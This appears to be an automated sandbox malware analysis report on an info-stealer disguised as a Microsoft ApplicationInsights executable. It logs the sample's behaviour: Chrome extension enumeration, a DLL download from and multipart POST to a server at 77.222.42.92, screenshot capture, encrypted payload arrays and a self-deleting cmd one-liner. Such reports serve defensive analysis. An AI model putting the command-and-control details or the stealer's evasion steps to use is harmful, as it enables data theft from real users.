Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose, 2_2_00404DD0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1
    Host: 77.222.42.92
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /goodnews.php HTTP/1.1
    Host: 77.222.42.92
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /goodnews.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUS
    Host: 77.222.42.92
    Content-Length: 83420
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 13 Sep 2021 13:55:33 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: keep-aliveLast-Modified: Tue, 24 Aug 2021 22:41:19 GMTETag: "9d9d8-5ca55d50d41c0"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://dc.services.visualstudio.com/v2/trackY87C19923:
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: XBAIMOPZ.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403E70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_00403E70

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040A840 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_0040A840
Creates a DirectInput object (often for capturing keystrokes)
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

.NET source code contains very large array initializations
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Uses 32bit PE files
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
One or more processes crash
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Detected potential crypto function
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_00B0D8BE 0_2_00B0D8BE
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDDA8C 0_2_02DDDA8C
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDC088 0_2_02DDC088
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDE150 0_2_02DDE150
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDA698 0_2_02DDA698
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040F550 2_2_0040F550
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040EF50 2_2_0040EF50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040F360 2_2_0040F360
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040FDE0 2_2_0040FDE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_005AD8BE 2_2_005AD8BE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: String function: 00403C80 appears 466 times
Sample file is different than original file name gathered from version info
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAntiDump.dll2 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.727920654.0000000000B3F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000002.00000000.675135509.00000000005DF000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Section loaded: onecoreuapcommonproxystub.dll
PE file contains more sections than normal
Source: sqlite3.dll.2.dr Static PE information: Number of sections : 19 > 10
Source: sqlite3[1].dll.2.dr Static PE information: Number of sections : 19 > 10
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Virustotal: Detection: 40%
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File read: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp
Source: classification engine Classification label: mal72.spyw.evad.winEXE@9/9@0/1
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File read: C:\Users\user\Desktop\desktop.ini
Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3.dll.2.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: certificate valid
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
